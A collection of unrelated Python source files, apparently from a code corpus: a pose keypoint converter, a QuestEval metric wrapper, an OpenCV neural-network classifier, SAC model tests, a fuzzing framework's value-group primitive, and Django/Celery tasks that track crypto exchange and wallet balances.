            num_arrays, len_arrays = target_pose_array.shape
        err_str = "Bad input. Array doesn't match target data format length."
        assert len_arrays == self.num_target_kpts * dim, err_str

        inv = np.nan  # -1
        source_pose_array = inv * np.ones((num_arrays, dim * self.num_source_kpts))
        if dim == 1:
            source_pose_array[:, self.index_map] = target_pose_array
        elif dim in [2, 3]:
            # transform an array in the target format to the source format
            s_x = inv * np.ones((num_arrays, self.num_source_kpts))
            s_x[:, self.index_map] = target_pose_array[:, 0::dim]
            source_pose_array[:, 0::dim] = s_x
            s_y = inv * np.ones((num_arrays, self.num_source_kpts))
            s_y[:, self.index_map] = target_pose_array[:, 1::dim]
            source_pose_array[:, 1::dim] = s_y
            if dim == 3:
                s_z = inv * np.ones((num_arrays, self.num_source_kpts))
                s_z[:, self.index_map] = target_pose_array[:, 2::dim]
                source_pose_array[:, 2::dim] = s_z
        else:
            raise ValueError("Dimension has to be one of: [1,2,3].")
        return source_pose_array
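# --- usage sketch (illustrative addition, not part of the original file) ---
# Two toy pose formats; the target keypoints must be a subset of the source.
# The keypoint names and coordinates are made up for illustration.
if __name__ == '__main__':
    src_cfg = {'KEYPOINT_NAMES': ['nose', 'l_eye', 'r_eye', 'neck']}
    tgt_cfg = {'KEYPOINT_NAMES': ['neck', 'nose']}
    conv = DataFormatConverter(src_cfg, tgt_cfg)

    # one 2-D pose in the source layout: (x, y) per keypoint, flattened
    src_pose = np.array([0., 1., 2., 3., 4., 5., 6., 7.])
    print(conv.source_to_target(src_pose, dim=2))  # [[6. 7. 0. 1.]]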
11570350
import json
import logging
from typing import Dict, List, Tuple, Union

from repro.common import util
from repro.common.docker import DockerContainer
from repro.common.io import read_jsonl_file
from repro.data.types import MetricsType, TextType
from repro.models import Model
from repro.models.scialom2021 import DEFAULT_IMAGE, MODEL_NAME

logger = logging.getLogger(__name__)


@Model.register(f"{MODEL_NAME}-questeval")
class QuestEval(Model):
    def __init__(self, image: str = DEFAULT_IMAGE, device: int = 0):
        self.image = image
        self.device = device

    @staticmethod
    def _check_single_text(texts_list: List[List[TextType]]) -> List[TextType]:
        single_texts = []
        for texts in texts_list:
            if texts is None:
                single_texts.append(None)
            else:
                if len(texts) != 1:
                    raise Exception(
                        f"QuestEval only supports single sources and references. Found: {len(texts)}"
                    )
                single_texts.append(texts[0])
        return single_texts

    def predict(
        self,
        candidate: TextType,
        sources: List[TextType] = None,
        references: List[TextType] = None,
        **kwargs,
    ) -> MetricsType:
        return self.predict_batch(
            [{"candidate": candidate, "sources": sources, "references": references}],
            **kwargs,
        )[0]

    def predict_batch(
        self, inputs: List[Dict[str, Union[TextType, List[TextType]]]], **kwargs
    ) -> Tuple[MetricsType, List[MetricsType]]:
        logger.info(f"Calculating QuestEval for {len(inputs)} inputs")

        candidates = [inp["candidate"] for inp in inputs]
        sources_list = [inp["sources"] if "sources" in inp else None for inp in inputs]
        references_list = [
            inp["references"] if "references" in inp else None for inp in inputs
        ]

        # QuestEval only supports single sources and references
        sources = self._check_single_text(sources_list)
        references = self._check_single_text(references_list)

        # Ensure all are strings or None
        candidates = [util.flatten(candidate) for candidate in candidates]
        sources = [
            util.flatten(source) if source is not None else None for source in sources
        ]
        references = [
            util.flatten(reference) if reference is not None else None
            for reference in references
        ]

        with DockerContainer(self.image) as backend:
            host_input_file = f"{backend.host_dir}/input.jsonl"
            container_input_file = f"{backend.container_dir}/input.jsonl"
            with open(host_input_file, "w") as out:
                for candidate, source, reference in zip(
                    candidates, sources, references
                ):
                    out.write(
                        json.dumps(
                            {
                                "candidate": candidate,
                                "source": source,
                                "reference": reference,
                            }
                        )
                        + "\n"
                    )

            host_output_file = f"{backend.host_dir}/output.jsonl"
            container_output_file = f"{backend.container_dir}/output.jsonl"

            kwargs_str = json.dumps(kwargs)
            if "'" in kwargs_str:
                raise Exception(
                    "Character `'` is currently not supported in values of `kwargs`"
                )

            cuda = self.device != -1
            commands = []
            if cuda:
                commands.append(f"export CUDA_VISIBLE_DEVICES={self.device}")
                score_device = 0
            else:
                score_device = -1

            commands.append(
                f"python score.py"
                f" --input-file {container_input_file}"
                f" --kwargs '{kwargs_str}'"
                f" --cuda-device {score_device}"
                f" --output-file {container_output_file}"
            )

            command = " && ".join(commands)
            backend.run_command(command=command, cuda=cuda, network_disabled=True)

            results = read_jsonl_file(host_output_file)
            micro_metrics = [{"questeval": metrics["scores"]} for metrics in results]
            macro_metrics = util.average_dicts(micro_metrics)
            return macro_metrics, micro_metrics


@Model.register(f"{MODEL_NAME}-questeval-summarization")
class QuestEvalForSummarization(QuestEval):
    @staticmethod
    def _check_and_update_kwargs(kwargs: Dict):
        if "task" in kwargs:
            if kwargs["task"] != "summarization":
                raise Exception(f'kwarg `task` must be equal to "summarization"')
        else:
            kwargs["task"] = "summarization"
        if "do_weighter" in kwargs:
            if kwargs["do_weighter"] != True:
                raise Exception(f"kwarg `do_weighter` must be equal to `True`")
        else:
            kwargs["do_weighter"] = True

    def predict(self, *args, **kwargs) -> MetricsType:
        self._check_and_update_kwargs(kwargs)
        return super().predict(*args, **kwargs)

    def predict_batch(self, *args, **kwargs) -> Tuple[MetricsType, List[MetricsType]]:
        self._check_and_update_kwargs(kwargs)
        return super().predict_batch(*args, **kwargs)


@Model.register(f"{MODEL_NAME}-questeval-simplification")
class QuestEvalForSimplification(QuestEval):
    @staticmethod
    def _check_and_update_kwargs(kwargs: Dict):
        if "task" in kwargs:
            if kwargs["task"] != "text_simplification":
                raise Exception(f'kwarg `task` must be equal to "text_simplification"')
        else:
            kwargs["task"] = "text_simplification"
        if "do_BERTScore" in kwargs:
            if kwargs["do_BERTScore"] != True:
                raise Exception(f"kwarg `do_BERTScore` must be equal to `True`")
        else:
            kwargs["do_BERTScore"] = True

    def predict(self, *args, **kwargs) -> MetricsType:
        self._check_and_update_kwargs(kwargs)
        return super().predict(*args, **kwargs)

    def predict_batch(self, *args, **kwargs) -> Tuple[MetricsType, List[MetricsType]]:
        self._check_and_update_kwargs(kwargs)
        return super().predict_batch(*args, **kwargs)
11570362
import argparse
import random
import cv2
import numpy as np
import pickle
import math

from sklearn import preprocessing
from collections import OrderedDict


class ClassifierANN(object):
    def __init__(self, feature_vector_size, label_words):
        self.ann = cv2.ml.ANN_MLP_create()
        # Number of centroids used to build the feature vectors
        input_size = feature_vector_size
        # Number of models to recognize
        output_size = len(label_words)
        # Applying Heaton rules
        hidden_size = (input_size * (2 / 3)) + output_size
        # Layer sizes can exceed 255, so an integer dtype wide enough to hold
        # them is required (np.uint8 would silently wrap large feature sizes)
        nn_config = np.array([input_size, hidden_size, output_size], dtype=np.int64)
        self.label_words = label_words
        self.ann.setLayerSizes(np.array(nn_config))
        # Symmetrical Sigmoid as activation function
        self.ann.setActivationFunction(cv2.ml.ANN_MLP_SIGMOID_SYM)
        # Map models as tuples of probabilities
        self.le = preprocessing.LabelBinarizer()
        self.le.fit(label_words)  # Label words are ['dress', 'footwear', 'backpack']

    def train(self, training_set):
        label_words = [item['label'] for item in training_set]
        dim_size = training_set[0]['feature_vector'].shape[1]
        train_samples = np.asarray(
            [np.reshape(x['feature_vector'], (dim_size,)) for x in training_set]
        )
        # Convert item labels into encoded binary tuples
        train_response = np.array(self.le.transform(label_words), dtype=np.float32)
        self.ann.train(
            np.array(train_samples, dtype=np.float32),
            cv2.ml.ROW_SAMPLE,
            np.array(train_response, dtype=np.float32)
        )

    def get_confusion_matrix(self, testing_set):
        feature_vectors, expected_labels = self._get_network_io(testing_set)
        confusion_matrix = self._init_confusion_matrix(self.label_words)
        retval, test_outputs = self.ann.predict(feature_vectors)
        for expected_output, test_output in zip(expected_labels, test_outputs):
            expected_model = self.classify(expected_output)
            predicted_model = self.classify(test_output)
            confusion_matrix[expected_model][predicted_model] += 1
        return confusion_matrix

    def classify(self, encoded_word, threshold=0.5):
        models = self.le.inverse_transform(np.asarray([encoded_word]), threshold)
        return models[0]

    def _get_network_io(self, features_map):
        label_words = [item['label'] for item in features_map]
        dim_size = features_map[0]['feature_vector'].shape[1]
        inputs = np.asarray(
            [np.reshape(x['feature_vector'], (dim_size,)) for x in features_map]
        )
        outputs = np.array(self.le.transform(label_words), dtype=np.float32)
        return inputs, outputs

    def _init_confusion_matrix(self, label_words):
        confusion_matrix = OrderedDict()
        for label in label_words:
            confusion_matrix[label] = OrderedDict()
            for label2 in label_words:
                confusion_matrix[label][label2] = 0
        return confusion_matrix


def build_arg_parser():
    parser = argparse.ArgumentParser(description='Creates features for given images')
    parser.add_argument("--feature-map-file", dest="feature_map_file", required=True,
                        help="Input pickle file containing the feature map")
    parser.add_argument("--training-set", dest="training_set", required=True,
                        help="Percentage taken for training. ie 0.75")
    parser.add_argument("--ann-file", dest="ann_file", required=False,
                        help="Output file where ANN will be stored")
    parser.add_argument("--le-file", dest="le_file", required=False,
                        help="Output file where LabelEncoder class will be stored")
    return parser


def print_confusion_matrix(confusion_matrix):
    expected_models = confusion_matrix.keys()
    print('\t\t', '\t'.join([expected_type.ljust(15) for expected_type in expected_models]))
    for expected_type in expected_models:
        values = []
        for predicted_values in confusion_matrix.values():
            for predicted_model, value in predicted_values.items():
                if predicted_model == expected_type:
                    values.append(str(value).ljust(10))
        print('%s\t\t%s' % (expected_type.ljust(15), '\t'.join(values)))


def print_accuracy(confusion_matrix):
    acc_models = OrderedDict()
    for model in confusion_matrix.keys():
        acc_models[model] = {'TP': 0, 'TN': 0, 'FP': 0, 'FN': 0}
    for expected_model, predicted_models in confusion_matrix.items():
        for predicted_model, value in predicted_models.items():
            if predicted_model == expected_model:
                acc_models[expected_model]['TP'] += value
                acc_models[predicted_model]['TN'] += value
            else:
                acc_models[expected_model]['FN'] += value
                acc_models[predicted_model]['FP'] += value
    for model, rep in acc_models.items():
        acc = (rep['TP'] + rep['TN']) / (rep['TP'] + rep['TN'] + rep['FN'] + rep['FP'])
        print('%s \t %f' % (model, acc))


def split_feature_map(feature_map, training_set_per):
    feature_map_dict = dict()
    for item in feature_map:
        label = item['label']
        if label not in feature_map_dict:
            feature_map_dict[label] = list()
        feature_map_dict[label].append(item)
    training_feature_map = []
    testing_feature_map = []
    for label, feature_map_list in feature_map_dict.items():
        slice = math.trunc(len(feature_map_list) * training_set_per)
        random.shuffle(feature_map_list)
        training_feature_map += feature_map_list[:slice]
        testing_feature_map += feature_map_list[slice:]
    return training_feature_map, testing_feature_map


if __name__ == '__main__':
    args = build_arg_parser().parse_args()
    # Load the Feature Map
    with open(args.feature_map_file, 'rb') as f:
        feature_map = pickle.load(f)
    training_set, testing_set = split_feature_map(feature_map, float(args.training_set))
    label_words = np.unique([item['label'] for item in training_set])
    cnn = ClassifierANN(len(feature_map[0]['feature_vector'][0]), label_words)
    cnn.train(training_set)
    print("===== Confusion Matrix =====")
    confusion_matrix = cnn.get_confusion_matrix(testing_set)
    print_confusion_matrix(confusion_matrix)
    print("===== ANN Accuracy =====")
    print_accuracy(confusion_matrix)
    if 'ann_file' in args and 'le_file' in args:
        print("===== Saving ANN =====")
        with open(args.ann_file, 'wb') as f:
            cnn.ann.save(args.ann_file)
        with open(args.le_file, 'wb') as f:
            pickle.dump(cnn.le, f)
        print('Saved in: ', args.ann_file)
11570413
import argparse

import torch
from torch import Tensor

from pl_bolts.models.rl.sac_model import SAC


def test_sac_loss():
    """Test the SAC loss function."""
    parent_parser = argparse.ArgumentParser(add_help=False)
    parent_parser = SAC.add_model_specific_args(parent_parser)
    args_list = [
        "--env",
        "Pendulum-v0",
        "--batch_size",
        "32",
    ]
    hparams = parent_parser.parse_args(args_list)
    model = SAC(**vars(hparams))

    batch_states = torch.rand(32, 3)
    batch_actions = torch.rand(32, 1)
    batch_rewards = torch.rand(32)
    batch_dones = torch.ones(32)
    batch_next_states = torch.rand(32, 3)
    batch = (batch_states, batch_actions, batch_rewards, batch_dones, batch_next_states)

    policy_loss, q1_loss, q2_loss = model.loss(batch)

    assert isinstance(policy_loss, Tensor)
    assert isinstance(q1_loss, Tensor)
    assert isinstance(q2_loss, Tensor)


def test_sac_train_batch():
    """Tests that a single batch generates correctly."""
    parent_parser = argparse.ArgumentParser(add_help=False)
    parent_parser = SAC.add_model_specific_args(parent_parser)
    args_list = [
        "--env",
        "Pendulum-v0",
        "--batch_size",
        "32",
    ]
    hparams = parent_parser.parse_args(args_list)
    model = SAC(**vars(hparams))

    xp_dataloader = model.train_dataloader()

    batch = next(iter(xp_dataloader))
    assert len(batch) == 5
    assert len(batch[0]) == model.hparams.batch_size
    assert isinstance(batch, list)
    assert all(isinstance(batch[i], Tensor) for i in range(5))
11570430
from .base_primitive import BasePrimitive


class Group(BasePrimitive):
    def __init__(self, name, values):
        """
        This primitive represents a list of static values, stepping through each one on mutation.
        You can tie a block to a group primitive to specify that the block should cycle through all
        possible mutations for *each* value within the group. The group primitive is useful for
        example for representing a list of valid opcodes.

        @type  name:   str
        @param name:   Name of group
        @type  values: list or str
        @param values: List of possible raw values this group can take.
        """
        super(Group, self).__init__()
        self._name = name
        self.values = values
        assert len(self.values) > 0, "You can't have an empty value list for your group!"

        self._value = self._original_value = self.values[0]

        for val in self.values:
            assert isinstance(val, basestring), "Value list may only contain strings or raw data"

    @property
    def name(self):
        return self._name

    def mutate(self):
        """
        Move to the next item in the values list.

        @rtype:  bool
        @return: False
        """
        # TODO: See if num_mutations() can be done away with (me thinks yes).
        if self._mutant_index == self.num_mutations():
            self._fuzz_complete = True

        # if fuzzing was disabled or complete, and mutate() is called,
        # ensure the original value is restored.
        if not self._fuzzable or self._fuzz_complete:
            self._value = self._original_value
            return False

        # step through the value list.
        # TODO: break this into a get_value() function, so we can keep
        # mutate as close to standard as possible.
        self._value = self.values[self._mutant_index]

        # increment the mutation count.
        self._mutant_index += 1

        return True

    def num_mutations(self):
        """
        Number of values in this primitive.

        @rtype:  int
        @return: Number of values in this primitive.
        """
        return len(self.values)
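
# A minimal sketch of driving the primitive above by hand; it assumes
# BasePrimitive initializes _mutant_index to 0 and _fuzzable to True,
# as the mutate() logic above implies. The opcode list is hypothetical.
opcodes = Group("opcode", values=["\x01", "\x02", "\x03"])
while opcodes.mutate():
    # on each pass, _value holds the next opcode from the list
    print(repr(opcodes._value))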
11570472
from __future__ import absolute_import, unicode_literals

import importlib
import re
import binascii
from json import JSONDecodeError

from djangoTrade.celery import app
from ccxt import ExchangeNotAvailable, RequestTimeout
from celery.schedules import crontab
from celery.task import periodic_task
import datetime
import time
import requests
from decimal import Decimal as _D
from django.contrib.auth.models import User

from trade.models import UserExchange, UserBalance, Coin, Exchanges, Wallets, UserWallet, Transaction, UserHoldings
from yandex_money.api import Wallet
from tradeBOT.models import ExchangeCoin, Pair, CoinMarketCupCoin, ExchangeMainCoin
from ticker_app.models import ExchangeTicker


def class_for_name(module_name, class_name):
    m = importlib.import_module(module_name)
    c = getattr(m, class_name)
    return c


@app.task()
def pull_exchanges_balances(ue_pk=None):
    unnecessary_keys = ['free', 'total', 'used', 'info']
    if ue_pk is None:
        user_exchanges = UserExchange.objects.filter(is_active=True)
    else:
        user_exchanges = UserExchange.objects.filter(pk=ue_pk)
    if len(user_exchanges) > 0:
        for user_exchange in user_exchanges:
            exchange_object = class_for_name('ccxt', user_exchange.exchange.name)(
                {'apiKey': user_exchange.apikey, 'secret': user_exchange.apisecret})
            try:
                try:
                    balances = exchange_object.fetch_balance()
                except binascii.Error:
                    user_exchange.error = 'Incorrect apikey or secret'
                    user_exchange.is_correct = False
                    user_exchange.is_active = False
                    user_exchange.save()
                    continue
                if balances:
                    total_btc = _D(0)
                    for item in balances.items():
                        if item[0] not in unnecessary_keys:
                            try:
                                user_coin = UserBalance.objects.get(ue=user_exchange, coin=item[0].lower())
                                user_coin.total = (item[1]['total'] if item[1]['total'] is not None else 0)
                                user_coin.btc_value, user_coin.conversions = fetch_btc_value(
                                    user_exchange.exchange, item[0].lower(), item[1]['total'])
                                user_coin.used = (item[1]['used'] if item[1]['used'] is not None else 0)
                                user_coin.free = (item[1]['free'] if item[1]['free'] is not None else 0)
                                user_coin.save()
                                total_btc += _D(user_coin.btc_value)
                            except UserBalance.DoesNotExist:
                                new_user_coin = UserBalance()
                                new_user_coin.ue = user_exchange
                                new_user_coin.coin = item[0].lower()
                                new_user_coin.total = (item[1]['total'] if not item[1]['total'] is None else 0)
                                new_user_coin.btc_value, new_user_coin.conversions = fetch_btc_value(
                                    user_exchange.exchange, item[0].lower(), item[1]['total'])
                                new_user_coin.used = (item[1]['used'] if item[1]['used'] is not None else 0)
                                new_user_coin.free = (item[1]['free'] if item[1]['free'] is not None else 0)
                                new_user_coin.save()
                                total_btc += _D(new_user_coin.btc_value)
                    user_exchange.total_btc = total_btc
                    user_exchange.total_usd = get_usd_value('btc', total_btc)
                    user_exchange.save()
            except ExchangeNotAvailable as e:
                # user_exchange.is_active = False
                # user_exchange.is_active_script = False
                user_exchange.error = e
                user_exchange.save()
            except RequestTimeout:
                continue
    return True


def fetch_btc_value(exchange, coin, amount=None, convertations=None):
    if amount is None:
        amount = 0
    if _D(amount) == _D(0):
        return 0, 'Null balance'
    if convertations is None:
        convertations = [coin + ' (' + str(_D(str(amount)).quantize(_D('.00000001'))) + ')']
    if coin.lower() == 'btc':
        return amount, '->'.join(convertations)
    try:
        coin = ExchangeCoin.objects.get(symbol=coin.lower(), exchange=exchange)
        # print('Found currency: {}'.format(coin.symbol.upper()))
        try:
            # print('1. Looking for pair BTC_{}'.format(coin.symbol.upper()))
            pair = Pair.objects.get(main_coin=ExchangeCoin.objects.get(symbol='btc', exchange=exchange),
                                    second_coin=coin)
            # print('1. Found pair {}_{}'.format(pair.main_coin.symbol, pair.second_coin.symbol))
            ticker = ExchangeTicker.objects.filter(pair_id=pair.pk, exchange_id=exchange.pk).latest('id')
            # print('1. Found ticker {} {}'.format(ticker, ticker.last))
            new_amount = _D(amount).quantize(_D('.00000001')) * _D(ticker.last).quantize(_D('.00000001'))
            convertations.append('btc (' + str(_D(str(new_amount)).quantize(_D('.00000001'))) + ')')
            return new_amount, '->'.join(convertations)
        except Pair.DoesNotExist:
            try:
                # print('2. Looking for pair {}_BTC'.format(coin.symbol.upper()))
                pair = Pair.objects.get(second_coin=ExchangeCoin.objects.get(symbol='btc', exchange=exchange),
                                        main_coin=coin)
                # print('2. Found pair {}_{}'.format(pair.main_coin.symbol, pair.second_coin.symbol))
                ticker = ExchangeTicker.objects.filter(pair_id=pair.pk, exchange_id=exchange.pk).latest('id')
                # print('2. Found ticker {} {}'.format(ticker, ticker.last))
                new_amount = _D(amount).quantize(_D('.00000001')) / _D(ticker.last).quantize(_D('.00000001'))
                convertations.append('btc (' + str(_D(str(new_amount)).quantize(_D('.00000001'))) + ')')
                return new_amount, '->'.join(convertations)
            except Pair.DoesNotExist:
                try:
                    # print('3. Looking for a pair whose second coin is {}'.format(coin.symbol.upper()))
                    pair = Pair.objects.get(second_coin=coin)
                    # print('3. Found pair {}_{}'.format(pair.main_coin.symbol, pair.second_coin.symbol))
                    ticker = ExchangeTicker.objects.filter(pair_id=pair.pk, exchange_id=exchange.pk).latest('id')
                    # print('3. Found ticker {} {}'.format(ticker, ticker.last))
                    in_first_coin = _D(ticker.last) * _D(amount)
                    convertations.append(
                        pair.main_coin.symbol + ' (' + str(_D(str(in_first_coin)).quantize(_D('.00000001'))) + ')')
                    # recurse through the intermediate coin and propagate the result
                    return fetch_btc_value(exchange, pair.main_coin.symbol, in_first_coin, convertations)
                except Pair.DoesNotExist:
                    # print('3. Pair not found')
                    return 0, 'Not found'
                except ExchangeTicker.DoesNotExist:
                    # print('3. Ticker not found')
                    return 0, 'Not found'
            except ExchangeTicker.DoesNotExist:
                # print('2. Ticker not found')
                return 0, 'Not found'
        except ExchangeTicker.DoesNotExist:
            # print('1. Ticker not found')
            return 0, 'Not found'
    except ExchangeCoin.DoesNotExist:
        # print('Currency not found')
        return 0, 'Not found'


@periodic_task(run_every=datetime.timedelta(minutes=5))
def pull_exchanges_tickers():
    exchanges = Exchanges.objects.all()
    for exchange in exchanges:
        exchange_object = class_for_name('ccxt', exchange.name)()
        try:
            for item, value in exchange_object.fetch_tickers().items():
                pair = re.match(r'([a-zA-Z0-9]+)/([a-zA-Z0-9]+)', item)
                try:
                    main_coin = ExchangeCoin.objects.get(exchange=exchange, symbol=pair.group(2))
                    second_coin = ExchangeCoin.objects.get(exchange=exchange, symbol=pair.group(1))
                    pair = Pair.objects.get(main_coin=main_coin, second_coin=second_coin)
                    new_ticker = ExchangeTicker()
                    new_ticker.exchange_id = exchange.pk
                    new_ticker.pair_id = pair.pk
                    new_ticker.high = value['high']
                    new_ticker.low = value['low']
                    new_ticker.bid = value['bid']
                    new_ticker.ask = value['ask']
                    new_ticker.base_volume = value['baseVolume']
                    new_ticker.last = value['last']
                    new_ticker.date_time = value['datetime']
                    new_ticker.save()
                except ExchangeCoin.DoesNotExist:
                    pass
                except Pair.DoesNotExist:
                    pass
        except ExchangeNotAvailable:
            continue
    # pull_exchanges_balances.delay()
    return True


@app.task()
def pull_exchanges():
    get_all_coins.delay()
    exchanges = Exchanges.objects.all()
    for exchange in exchanges:
        exchange_object = class_for_name('ccxt', exchange.name)()
        markets = exchange_object.fetch_markets()
        for item in markets:
            coins = [item['quote'], item['base']]
            for coin in coins:
                try:
                    market_cup_coin = CoinMarketCupCoin.objects.filter(symbol=coin.lower()).earliest('rank')
                    if market_cup_coin:
                        try:
                            old_coin = ExchangeCoin.objects.get(exchange=exchange, symbol=coin.lower())
                            old_coin.rank = market_cup_coin.rank
                            old_coin.save()
                        except ExchangeCoin.DoesNotExist:
                            new_coin = ExchangeCoin()
                            new_coin.exchange = exchange
                            new_coin.symbol = coin.lower()
                            new_coin.rank = market_cup_coin.rank
                            new_coin.save()
                except CoinMarketCupCoin.DoesNotExist:
                    pass
            try:
                coin = ExchangeCoin.objects.get(exchange=exchange, symbol=coins[0].lower())
                ExchangeMainCoin.objects.get_or_create(coin=coin)
            except ExchangeCoin.DoesNotExist:
                pass
            try:
                main_coin = ExchangeCoin.objects.get(exchange=exchange, symbol=coins[0].lower())
                second_coin = ExchangeCoin.objects.get(exchange=exchange, symbol=coins[1].lower())
                try:
                    old_pair = Pair.objects.get(main_coin=main_coin, second_coin=second_coin)
                    frozen = exchange.info_frozen_key
                    field = frozen.replace('-', '')
                    if frozen.startswith('-'):
                        old_pair.is_active = not bool(int(item['info'][field]))
                    else:
                        old_pair.is_active = bool(int(item['info'][field]))
                    old_pair.save()
                except Pair.DoesNotExist:
                    pair = Pair()
                    pair.main_coin = main_coin
                    pair.second_coin = second_coin
                    frozen = exchange.info_frozen_key
                    field = frozen.replace('-', '')
                    if frozen.startswith('-'):
                        pair.is_active = not bool(int(item['info'][field]))
                    else:
                        pair.is_active = bool(int(item['info'][field]))
                    pair.save()
            except ExchangeCoin.DoesNotExist:
                pass
    return True


@app.task()
def get_all_coins():
    response = requests.get('https://poloniex.com/public?command=returnCurrencies').json()
    for item in response:
        try:
            Coin.objects.get(short_name=item)
        except Coin.DoesNotExist:
            new_coin = Coin()
            new_coin.short_name = item
            new_coin.full_name = response[item]['name']
            new_coin.save()
    return True


@periodic_task(run_every=crontab(minute='*/2'))
def get_eth_wallet_history():
    wallet, c = Wallets.objects.get_or_create(name='ETH')
    eth_uw = UserWallet.objects.filter(wallet=wallet)
    eth_to_btc = CryptoConvert('btc', 'eth')
    eth_to_usd = CryptoConvert('usd', 'eth')
    if len(eth_uw) > 0:
        for uw in eth_uw:
            balance = requests.get(
                'https://api.etherscan.io/api?module=account&action=balance&address=' + uw.address +
                '&tag=latest&apikey=<KEY>').json()
            if balance['status'] == str(1):
                uw.balance = balance['result']
                uw.total_usd = eth_to_usd.convert('usd', 'eth', round(float(float(balance['result']) / (10 ** 18)), 8))
                uw.total_btc = eth_to_btc.convert('btc', 'eth', round(float(float(balance['result']) / (10 ** 18)), 8))
                uw.save()
            history = requests.get(
                'https://api.etherscan.io/api?module=account&action=txlist&address=' + uw.address +
                '&startblock=0&endblock=99999999&sort=desc&apikey=<KEY>').json()
            if history['status'] == str(1):
                for item in history['result']:
                    try:
                        Transaction.objects.get(hash=item['hash'], name=uw.wallet.name + str(uw.pk))
                    except Transaction.MultipleObjectsReturned:
                        pass
                    except Transaction.DoesNotExist:
                        transaction = Transaction()
                        transaction.name = uw.wallet.name + str(uw.pk)
                        transaction.t_type = 'wallet'
                        transaction.number = item['blockNumber']
                        transaction.date = datetime.datetime.fromtimestamp(int(item['timeStamp'])).strftime(
                            '%Y-%m-%d %H:%M:%S')
                        transaction.t_from = item['from']
                        transaction.t_to = item['to']
                        transaction.currency = 'ETH'
                        if item['to'] == uw.address.lower():
                            transaction.type = 'in'
                        elif item['from'] == uw.address.lower():
                            transaction.type = 'out'
                        else:
                            transaction.type = 'unknown'
                        transaction.value = item['value']
                        transaction.usd_value = eth_to_usd.convert(
                            'usd', 'eth', round(float(float(item['value']) / (10 ** 18)), 8))
                        transaction.hash = item['hash']
                        transaction.block_hash = item['blockHash']
                        transaction.save()
        print('ok')
    else:
        print("No wallets found")
    return True


@periodic_task(run_every=crontab(minute='*/2'))
def get_btc_wallet_history():
    wallet, c = Wallets.objects.get_or_create(name='BTC')
    btc_uw = UserWallet.objects.filter(wallet=wallet)
    if len(btc_uw) > 0:
        for uw in btc_uw:
            btc_to_usd = CryptoConvert('usd', 'btc')
            data = requests.get('https://blockchain.info/ru/rawaddr/' + uw.address)
            try:
                transactions = data.json()
                if transactions:
                    uw.balance = transactions['final_balance'] / 100000000
                    uw.total_usd = btc_to_usd.convert('usd', 'btc', uw.balance)
                    uw.total_btc = uw.balance
                    uw.save()
                    for item in transactions['txs']:
                        try:
                            transaction = Transaction.objects.get(name=uw.wallet.name + str(uw.pk), hash=item['hash'])
                        except Transaction.MultipleObjectsReturned:
                            pass
                        except Transaction.DoesNotExist:
                            transaction = Transaction()
                            transaction.name = uw.wallet.name + str(uw.pk)
                            transaction.t_type = 'wallet'
                            transaction.number = item['tx_index']
                            transaction.date = datetime.datetime.fromtimestamp(item['time'])
                            transaction.currency = 'BTC'
                            t_from = ''
                            transaction.type = 'unknown'
                            for item_from in item['inputs']:
                                t_from += item_from['prev_out']['addr'] + '<br/>'
                                if item_from['prev_out']['addr'] == uw.address:
                                    transaction.type = 'out'
                                    transaction.value = _D(item_from['prev_out']['value']) / _D(100000000)
                            t_to = ''
                            for item_to in item['out']:
                                t_to += item_to['addr'] + '<br/>'
                                if item_to['addr'] == uw.address:
                                    transaction.type = 'in'
                                    transaction.value = _D(item_to['value']) / _D(100000000)
                            transaction.t_to = t_to
                            transaction.t_from = t_from
                            transaction.usd_value = btc_to_usd.convert('usd', 'btc', _D(transaction.value))
                            transaction.hash = item['hash']
                            transaction.block_hash = '-'
                            transaction.save()
            except JSONDecodeError as json_er:
                print('Response parsing error: {}'.format(json_er))
                continue
    else:
        print("No wallets found")
    return True


@periodic_task(run_every=crontab(minute='*/2'))
def get_yandex_wallet_history():
    wallet, c = Wallets.objects.get_or_create(name='Yandex Money')
    yandex_uw = UserWallet.objects.filter(wallet=wallet)
    if len(yandex_uw) > 0:
        for uw in yandex_uw:
            access_token = uw.access_token
            if access_token is not None:
                yandex_wallet_object = Wallet(access_token)
                account_info = yandex_wallet_object.account_info()
                uw.balance = account_info['balance']
                uw.total_btc = get_btc_value('rur', account_info['balance'])
                uw.total_usd = get_usd_value('rur', account_info['balance'])
                uw.save()
                get_yandex_records(wallet=yandex_wallet_object, uw=uw)
        print('ok')
    else:
        print("No wallets found")
    return True


def get_yandex_records(wallet=None, uw=None, next_record=0):
    transactions = wallet.operation_history(
        {'start_record': int(next_record), 'details': 'true', 'records': 100})
    rur_to_usd = CryptoConvert('usd', 'rur')
    for t in transactions['operations']:
        try:
            Transaction.objects.get(name=uw.wallet.name + str(uw.pk), number=t['operation_id'])
        except Transaction.MultipleObjectsReturned:
            pass
        except Transaction.DoesNotExist:
            new_transaction = Transaction()
            new_transaction.name = uw.wallet.name + str(uw.pk)
            new_transaction.t_type = 'wallet'
            new_transaction.number = new_transaction.hash = t['operation_id']
            new_transaction.date = t['datetime']
            new_transaction.type = t['direction']
            new_transaction.currency = 'RUR'
            new_transaction.t_from = new_transaction.t_to = '-'
            if 'details' in t:
                if len(t['details']) > 0:
                    new_transaction.details = t['details']
            if 'title' in t:
                if len(t['title']) > 0:
                    new_transaction.title = t['title']
            new_transaction.value = t['amount']
            new_transaction.usd_value = rur_to_usd.convert('usd', 'rur', float(t['amount']))
            # new_transaction.usd_value = get_usd_value('rur', float(t['amount']))
            new_transaction.save()
    try:
        next_rec = transactions['next_record']
    except KeyError:
        next_rec = None
    if next_rec is not None:
        get_yandex_records(wallet, uw=uw, next_record=transactions['next_record'])


@periodic_task(run_every=crontab(minute='*/1'))
def calculate_holdings_history():
    date = datetime.datetime.fromtimestamp(int(time.time())).strftime('%Y-%m-%d %H:%M:%S')
    users = User.objects.all()
    for user in users:
        wallets = UserWallet.objects.filter(user=user)
        if len(wallets) > 0:
            for wallet in wallets:
                holdings = UserHoldings()
                holdings.user = user
                holdings.type = 'Wallet@' + wallet.wallet.name + '(' + str(wallet.pk) + ')'
                holdings.total_btc = wallet.total_btc
                holdings.total_usd = wallet.total_usd
                holdings.date_time = date
                holdings.save()
        exchanges = UserExchange.objects.filter(user=user)
        if len(exchanges) > 0:
            for exchange in exchanges:
                holdings = UserHoldings()
                holdings.user = user
                holdings.type = 'Exchange@' + exchange.exchange.name + '(' + str(exchange.pk) + ')'
                holdings.total_btc = exchange.total_btc
                holdings.total_usd = exchange.total_usd
                holdings.date_time = date
                holdings.save()
    return True


def get_btc_value(coin_name=None, count=None):
    time.sleep(0.1)
    if not coin_name or not count:
        return 0
    else:
        if coin_name == 'dsh' or coin_name == 'DSH':
            coin_name = 'dash'
